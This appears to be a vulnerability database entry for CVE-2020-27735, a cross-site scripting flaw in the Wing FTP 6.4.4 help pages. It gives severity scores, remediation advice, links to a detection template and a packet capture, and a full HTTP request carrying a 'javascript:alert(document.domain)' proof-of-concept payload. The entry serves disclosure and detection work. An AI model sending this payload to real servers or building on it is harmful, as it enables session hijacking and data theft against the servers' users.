🔙 목록으로 돌아가기

CVE-2020-27735: Wing FTP 6.4.4 - Cross-Site Scripting

TitleWing FTP 6.4.4 - Cross-Site Scripting
Authorpikpikcu
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
RemediationUpgrade to the latest version of Wing FTP server or apply the vendor-provided patch to mitigate this vulnerability.
CVSS Score6.1
EPSS Score0.37
CVE IDCVE-2020-27735
CWE IDCWE-79
Tags cve cve2020 xss wing-ftp wftpserver vuln

🔍 Vulnerability Description

Wing FTP 6.4.4 is vulnerable to cross-site scripting via its web interface because an arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user’s browser.

🌐 HTTP Request

GET /help/english/index.html?javascript:alert(document.domain) HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-27735.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-27735.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A